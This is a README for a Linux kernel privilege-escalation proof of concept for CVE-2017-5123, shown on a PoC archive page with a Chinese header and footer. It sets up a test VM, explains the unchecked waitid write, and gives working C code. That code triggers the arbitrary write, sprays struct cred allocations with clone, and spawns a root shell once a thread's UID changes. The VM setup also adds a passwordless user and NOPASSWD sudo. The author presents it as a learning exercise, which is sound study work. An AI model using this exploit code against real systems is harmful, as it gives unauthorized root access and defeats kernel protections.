关联漏洞
描述
PoC CVE-2017-5123 - LPE - Bypassing SMEP/SMAP. No KASLR
介绍
# CVE-2017-5123
PoC CVE-2017-5123 - LPE - Bypassing SMEP/SMAP. No KASLR
> [The waitid implementation in upstream kernels did not restrict the target destination to copy information results. This can allow local users to write to otherwise protected kernel memory, which can lead to privilege escalation.]( https://access.redhat.com/security/cve/cve-2017-5123 "Reference")
## Introduction
In this little writeup, I will analyze a kernel vulnerability that allow us to obtain _root_ privilege.
This file is divided into four parts:
1. [VM setup](https://github.com/c3r34lk1ll3r/CVE-2017-5123#vm-setup);
2. [vulnerability analysis](https://github.com/c3r34lk1ll3r/CVE-2017-5123#vulnerability);
3. [exploitation](https://github.com/c3r34lk1ll3r/CVE-2017-5123#exploitation);
4. [PoC](https://github.com/c3r34lk1ll3r/CVE-2017-5123#poc).
I want to point out that there are a lot of better ways to exploit this CVE (indeed, this is just a _PoC_ for learning the kernel, it can't be used _in the wild_) but I think that this methodology can be useful as an introduction to kernel exploitation.
## VM Setup
### Kernel Build
This vulnerability was introduced in _4c48abe91be0_ so we need to build that version of the kernel.
This can be a little tricky because this is an old version and the code should be patched.
I made a [repository](https://github.com/c3r34lk1ll3r/kernel_mirror/tree/modified_v4.14) with an already patched kernel code and a [`.config`](https://gist.github.com/c3r34lk1ll3r/c9c34ae86140cc7a24d0d90141686ee8) file so you can _clone and build_.
```shell
git clone https://github.com/c3r34lk1ll3r/kernel_mirror.git
cd kernel_mirror
git checkout origin/modified_v4.14
wget https://gist.githubusercontent.com/c3r34lk1ll3r/c9c34ae86140cc7a24d0d90141686ee8/raw/52431b577a71e3fe8f89d6ce355ce9c1c54c53b6/.config
make -j 8 --output-sync=recurse
```
Note that this kernel will be built with _virtio_ drivers so you can use _virtio disk_ for sharing file from/to VM.
### Rootfs Setup
Now, we will create the initial _rootfs_:
```shell
qemu-img create -f raw hda.raw 10G
# Format the disk to ext4
mkfs.ext4 ./hda.raw
# Make a mountpoint for the image
mkdir /tmp/mount1
# Mount the disk
sudo mount -o loop ./hda.raw /tmp/mount1
```
Then, we should install a basic Linux distribution, for example using `pacstrap` or `debootstrap`.
```shell
sudo pacstrap /tmp/mount1 base base-devel vim
```
Finally, we can modify the system:
```shell
# Add a 'test' user
echo 'test:x:1000:1000::/home/test:/bin/bash' | sudo tee -a /tmp/mount1/etc/passwd
# without password
echo 'test::14871::::::' | sudo tee -a /tmp/mount1/etc/shadow
# we can mount a virtio disk in order to share files between host and guest
echo '/transient /home/test/shared 9p trans=virtio,version=9p2000.L,rw,user,exec 0 0' | sudo tee -a /tmp/mount1/etc/fstab
sudo mkdir -p /tmp/mount1/home/test/shared
# It is usefull to have sudo permission
echo '%wheel ALL=(ALL) NOPASSWD: ALL' | sudo tee -a /tmp/mount1/etc/sudoers
echo 'wheel:x:998:test' | sudo tee -a /tmp/mount1/etc/group
sudo chown -R 1000:1000 /tmp/mount1/home/test
sudo umount /tmp/mount1
```
If everything is in order, we can now try our testing system with _qemu_:
```shell
qemu-system-x86_64 \
-kernel ./kernel_mirror/arch/x86_64/boot/bzImage \
-hda ./hda.raw \
-m 4G \
-cpu "Skylake-Client-IBRS,ss=on,vmx=on,hypervisor=on,tsc-adjust=on,clflushopt=on,umip=on,md-clear=on,stibp=on,arch-capabilities=on,ssbd=on,xsaves=on,pdpe1gb=on,ibpb=on,amd-ssbd=on,skip-l1dfl-vmentry=on,hle=off,rtm=off" \
-smp 4 \
-vga virtio \
-enable-kvm \
-nographic \
-machine type=q35,accel=kvm \
-virtfs "fsdriver=local,id=fs.1,path=./trans_fs,security_model=mapped,writeout=immediate,mount_tag=/transient" \
-append "root=/dev/sda rw noquiet nokaslr console=ttyS0 loglevel=5" \
-chardev "vc,id=vc.0,cols=1920,rows=1080" \
-net "user,hostfwd=tcp::10022-:22" \
-net "nic" \
-s
```
## Vulnerability
The description of the CVE says that there is an unrestricted write operation during the `waitid` system call.
Let's open `kernel/exit.c` and look the code:
```c
SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
infop, int, options, struct rusage __user *, ru)
{
struct rusage r;
struct waitid_info info = {.status = 0};
long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
int signo = 0;
if (err > 0) {
signo = SIGCHLD;
err = 0;
if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
return -EFAULT;
}
if (!infop)
return err;
user_access_begin();
unsafe_put_user(signo, &infop->si_signo, Efault);
unsafe_put_user(0, &infop->si_errno, Efault);
unsafe_put_user(info.cause, &infop->si_code, Efault);
unsafe_put_user(info.pid, &infop->si_pid, Efault);
unsafe_put_user(info.uid, &infop->si_uid, Efault);
unsafe_put_user(info.status, &infop->si_status, Efault);
user_access_end();
return err;
Efault:
user_access_end();
return -EFAULT;
}
```
This function is pretty straightforward: after few checks, there are various call to `unsafe_put_user(...)` and the function returns.
The main part of this function is composed by `unsafe_put_user(...)` function so let's move there (`arch/x86/include/asm/uaccess.h`):
```c
/*
* The "unsafe" user accesses aren't really "unsafe", but the naming
* is a big fat warning: you have to not only do the access_ok()
* checking before using them, but you have to surround them with the
* user_access_begin/end() pair.
*/
#define user_access_begin() __uaccess_begin()
#define user_access_end() __uaccess_end()
#define unsafe_put_user(x, ptr, err_label) \
do { \
int __pu_err; \
__typeof__(*(ptr)) __pu_val = (x); \
__put_user_size(__pu_val, (ptr), sizeof(*(ptr)), __pu_err, -EFAULT); \
if (unlikely(__pu_err)) goto err_label; \
} while (0)
#define unsafe_get_user(x, ptr, err_label) \
do { \
int __gu_err; \
__inttype(*(ptr)) __gu_val; \
__get_user_size(__gu_val, (ptr), sizeof(*(ptr)), __gu_err, -EFAULT); \
(x) = (__force __typeof__(*(ptr)))__gu_val; \
if (unlikely(__gu_err)) goto err_label; \
} while (0)
```
There is a **big fat warning** in the comment: if you want to use `unsafe_put/get_user` you should first call `access_ok()` and surround them with `user_access_begin/end()`.
If we take a look at the previous code (`waitid`) we can see that `access_ok()` is never called so the system call _violates_ this _warning_.
But what are those macros?
### SMAP/SMEP
_SMAP_ and _SMEP_ are two security features introduced in the kernel in order to makes harder to write exploits. To be noted that those features are enforced by the CPU.
_SMEP_ prevents to **execute** userspace code while the CPU is in supervisor mode; _SMAP_, instead, blocks **read/write** access to user memory.
The kernel needs to write/read data to/from user memory and this can be accomplished in two ways:
1. there are functions (e.g. `copy_from_user`) that allows to copy the memory in kernel space;
2. temporarily disable _SMAP_
As we can see in the definition of `unsafe_put_user`, this function will only copy the value of `x` in memory pointed by `ptr` (and jump to `err_label` if there was an error). We have just said that the kernel can't access to userspace because _SMAP_ and this is why those functions should be wrapped between `user_access_begin/end()`.
```c
#define __uaccess_begin() stac()
#define __uaccess_end() clac()
```
As we can see, `user_access_begin/end` simply are the _ASM_ instruction `stac` and `clac`.
- `stac`: "Sets the AC flag bit in EFLAGS register. This may enable alignment checking of user-mode data accesses. This allows explicit supervisor-mode data accesses to user-mode pages even if the SMAP bit is set in the CR4 register."
- `clac`: "Clears the AC flag bit in EFLAGS register. This disables any alignment checking of user-mode data accesses. If the SMAP bit is set in the CR4 register, this disallows explicit supervisor-mode data accesses to user-mode pages."
Basically, these two macros enable/disable _SMAP_.
Our previous "warning" mentions also `access_ok` function:
```c
/**
* access_ok: - Checks if a user space pointer is valid
* @type: Type of access: %VERIFY_READ or %VERIFY_WRITE. Note that
* %VERIFY_WRITE is a superset of %VERIFY_READ - if it is safe
* to write to a block, it is always safe to read from it.
* @addr: User space pointer to start of block to check
* @size: Size of block to check
*
* Context: User context only. This function may sleep if pagefaults are
* enabled.
*
* Checks if a pointer to a block of memory in user space is valid.
*
* Returns true (nonzero) if the memory block may be valid, false (zero)
* if it is definitely invalid.
*
* Note that, depending on architecture, this function probably just
* checks that the pointer is in the user space range - after calling
* this function, memory access functions may still return -EFAULT.
*/
#define access_ok(type, addr, size) \
({ \
WARN_ON_IN_IRQ(); \
likely(!__range_not_ok(addr, size, user_addr_max())); \
})
```
The comment here is self explanatory: this macro checks if the pointer is a valid **user space pointer**.
### Arbitrary write
Let's take another look on the `waitid` code:
```c
user_access_begin();
unsafe_put_user(signo, &infop->si_signo, Efault);
unsafe_put_user(0, &infop->si_errno, Efault);
unsafe_put_user(info.cause, &infop->si_code, Efault);
unsafe_put_user(info.pid, &infop->si_pid, Efault);
unsafe_put_user(info.uid, &infop->si_uid, Efault);
unsafe_put_user(info.status, &infop->si_status, Efault);
user_access_end();
```
As you already guessed, the absence of `access_ok()` leads to an _arbitrary write everywhere_ in memory because `infop` pointer is completly controlled by the attacker.
### Trigger the bug
It's really easy to reach the vulnerable path and we can create a _trigger_ with this simply code:
```c
int thread_ready;
int die_thread(void *arg){
thread_ready=1;
syscall(__NR_sched_yield);
return 0;
}
void *stack;
int trigger_bug(uint64_t where, int what){
printf("[0] Trying to overwrite 0x%016lx\r", where);
//int pid = fork(); // It is also possible to use fork syscall
thread_ready = 0;
int pid = clone(die_thread, stack, CLONE_VM | CLONE_FS|CLONE_FILES|CLONE_SYSVSEM | SIGCHLD, NULL);
int err;
while(thread_ready == 0) {syscall(__NR_sched_yield);} // We should wait the thread
err = syscall(__NR_waitid, P_PID, pid, where, WEXITED, NULL);
return err;
}
```
This simply code will trigger the vulnerability and write in the memory pointed by **where** address.
We can use _gdb_ if we want to check this trigger. For example, we can select an _arbitrary_ address and use the `trigger_bug` function to ovewrite it.
## Exploitation
This vulnerbility can be exploited in various way but I prefer a very simple approch.
Remember that we can write everywhere we want but the data written are partially controllee. We can overwrite an address with **0**.
The basic idea is to overwrite the _UID_ of our process and become _root_ but we first need to understand what are credentials in Linux.
### Fork
We start with digging into _fork_ system call. This function is used to create new processes.
We can check the code in `kernel/fork.c`:
```c
SYSCALL_DEFINE0(fork)
{
return _do_fork(SIGCHLD, 0, 0, NULL, NULL, 0);
}
```
So, `fork` system call is simply a wrapper for `_do_fork` with _hardcoded_ parameters.
This last function is a bit long but we can summarize it in this way:
```c
long _do_fork(unsigned long clone_flags,
unsigned long stack_start,
unsigned long stack_size,
int __user *parent_tidptr,
int __user *child_tidptr,
unsigned long tls)
{
struct task_struct *p;
int trace = 0;
long nr;
......
// This will create another task struct but it will NOT start the process.
p = copy_process(clone_flags, stack_start, stack_size,
child_tidptr, NULL, trace, tls, NUMA_NO_NODE);
add_latent_entropy();
......
// Wake up the new created task. This will set in RUNNING the state of the task and enqueue in the running queue code
wake_up_new_task(p);
......
put_pid(pid);
} else {
nr = PTR_ERR(p);
}
return nr;
}
```
This function will allocate a new `task_struct` object. Although this structure is really important (it describes a process), we will focus our attention to `cred` field:
```c
...
/* Process credentials: */
/* Tracer's credentials at attach: */
const struct cred __rcu *ptracer_cred;
/* Objective and real subjective task credentials (COW): */
const struct cred __rcu *real_cred;
/* Effective (overridable) subjective task credentials (COW): */
const struct cred __rcu *cred;
...
```
As we can see, there is (three) pointer to `struct cred`. Let's see how this structure is composed (`include/linux/cred.h`):
```
struct cred {
atomic_t usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
atomic_t subscribers; /* number of processes subscribed */
void *put_addr;
unsigned magic;
#define CRED_MAGIC 0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
kuid_t uid; /* real UID of the task */
kgid_t gid; /* real GID of the task */
kuid_t suid; /* saved UID of the task */
kgid_t sgid; /* saved GID of the task */
kuid_t euid; /* effective UID of the task */
kgid_t egid; /* effective GID of the task */
kuid_t fsuid; /* UID for VFS ops */
kgid_t fsgid; /* GID for VFS ops */
......
```
As we can see, the _UID_ of a process is simply an _unsigned integer_ (follow the definition of _kuid_t_) so we can simply overwrite this value with `0` in order to become _root_.
### Copy_process
The `task_struct` structure is allocated in `copy_process` function which is a bit complex and his main goal is to "copy" the process in a new one.
We can focus on the `copy_creds(p, clone_flags)` that is defined as:
```c
/*
* Copy credentials for the new process created by fork()
*
* We share if we can, but under some circumstances we have to generate a new
* set.
*
* The new process gets the current process's subjective credentials as its
* objective and subjective credentials
*/
int copy_creds(struct task_struct *p, unsigned long clone_flags)
{
struct cred *new;
int ret;
if (
#ifdef CONFIG_KEYS
!p->cred->thread_keyring &&
#endif
clone_flags & CLONE_THREAD
) {
p->real_cred = get_cred(p->cred);
get_cred(p->cred);
alter_cred_subscribers(p->cred, 2);
kdebug("share_creds(%p{%d,%d})",
p->cred, atomic_read(&p->cred->usage),
read_cred_subscribers(p->cred));
atomic_inc(&p->cred->user->processes);
return 0;
}
new = prepare_creds();
if (!new)
return -ENOMEM;
if (clone_flags & CLONE_NEWUSER) {
ret = create_user_ns(new);
if (ret < 0)
goto error_put;
}
.........
error_put:
put_cred(new);
return ret;
}
```
As we can see, this function calls `prepare_creds` where the real allocation is performed.
We have now a path to allocate an (pseudo)arbitrary number of _struct cred_:
1. `_do_fork()`
2. `copy_process()`
3. `copy_creds()`
Our last problems is how to call `_do_fork()` from userspace. We can use `fork` but this can be slow so we will use `clone` instead.
**Note**: we can't use `pthread` because of the flags: if you look the code `copy_creds` you should notice that there is a path where the structure is not really allocated.
## Put it all togheter
Now, a little recap:
1. we are able to trigger the bug and write in the memory
2. we know that we can write `0` in the memory
3. we know that if we overwrite the _UID_ of one process with `0`, it obtains _root_ permissions.
Now we need to know **where** write in memory and ,altought KASLR is disabled, the address of one `struct cred` is not enough stable so I decided to proced with _memory spraying_.
## Spraying
We need to find the `struct cred` in memory in order to detect a range of addresses. We can use _gdb_ and _python_ with a script like [this](https://github.com/c3r34lk1ll3r/CVE-2017-5123/blob/master/creds.py):
```python
....
for task in task_lists():
#gdb.write("{address} {pid} {comm}\n".format(
# address=task,
# pid=task["pid"],
# comm=task["comm"].string()))
comm = task["comm"].string()
# Insert your executable name
if comm == "exploit":
print(task['cred'])
....
```
**Note**: this script works only with KASLR disabled and with debug symbols (we neeed `init_task` pointer).
We can try a few times and we can see that the heap grown down so we can try a lower and go high.
Now we can use `clone` system call to spawn a lot of processes and thanks to _gdb_ we can check the addresses:
```c
stack=malloc(STACK_SIZE)+STACK_SIZE;
for(x=0;x<MAX_THREADS;x++){
stackTop = malloc(STACK_SIZE) + STACK_SIZE;
if (!stackTop){
perror("[-] Malloc");
return -1;
}
// spray_thread function can simply be a infinite loop
pid = clone(spray_thread, stackTop, CLONE_VM | CLONE_FS|CLONE_FILES|CLONE_SYSVSEM | SIGCHLD, NULL);
if (pid == -1){
perror("\n\nCLONE");
return -1;
}
printf("[0] Process created: %d\r", x);
}
```
**Note**: Maybe you can't spawn more than 4k processes. Check [_ulimits_](https://access.redhat.com/solutions/61334) if this is the case.
## PoC
Finally, we can write our _PoC_.
It is sufficient to call `trigger_bug` with different address (searching the structure) meanwhile our spawned thread will check its _UID_, like this:
```c
struct shared_area{
int one_win;
};
struct shared_area glob_var;
// Sprayed thread
int spray_thread(void *arg){
int uid;
int previous_one = syscall(__NR_getuid);
// Loop over syscall getUID
while(1){
uid = syscall(__NR_getuid);
//printf("UID: %d\n",uid);
// If returned UID is different from the previous one, then we have hitted a struct cred area
if (uid != previous_one){
printf("WIN!! with %d", uid);
// Kill other treads in order to stabilize the system
glob_var.one_win = 1;
// Simply spawn a shell
system("/bin/sh");
}
if(glob_var.one_win == 1)
return 1;
}
return 0;
}
```
There is a probability of 50% to hit the structure so after a few runs you can obtain _root_ privileage.

## Conclusion
This is a (basic) _PoC_ and the spraying is far from perfect. This is just an "introduction" to the amazing world of kernel, there are a lot of concepts that I skipped but they are extremly importants (like memory managment). If you want to study deeper you can take a look at `prepare_creds` and the memory allocations.
KASLR is disabled but this vulnerability allows to bypass this mitigation as well (`unsafe_put_user` doesn't crash with invalid address) but I don't think that adding a new "layer" of bruteforcing is useful if your goal is to learn kernel. If your objective is to use this vulnerability _in the wild_ you should write a different exploit (at least, different spraying).
Food for thought: I used this vulnerability to understand and try `ret2dir` techinque (Hint: you can trigger the write in the alias address and read the modification with userspace address).
## Reference
- https://salls.github.io/Linux-Kernel-CVE-2017-5123/
- https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part1.html
文件快照
[4.0K] /data/pocs/eb2b7dba81a95860a04ffc955d5ec5a6b5fa992a
├── [2.1K] creds.py
├── [ 102] gdb.script
├── [ 11K] LICENSE
├── [4.1K] main.c
├── [ 179] Makefile
├── [ 19K] README.md
└── [8.1K] win.png
0 directories, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。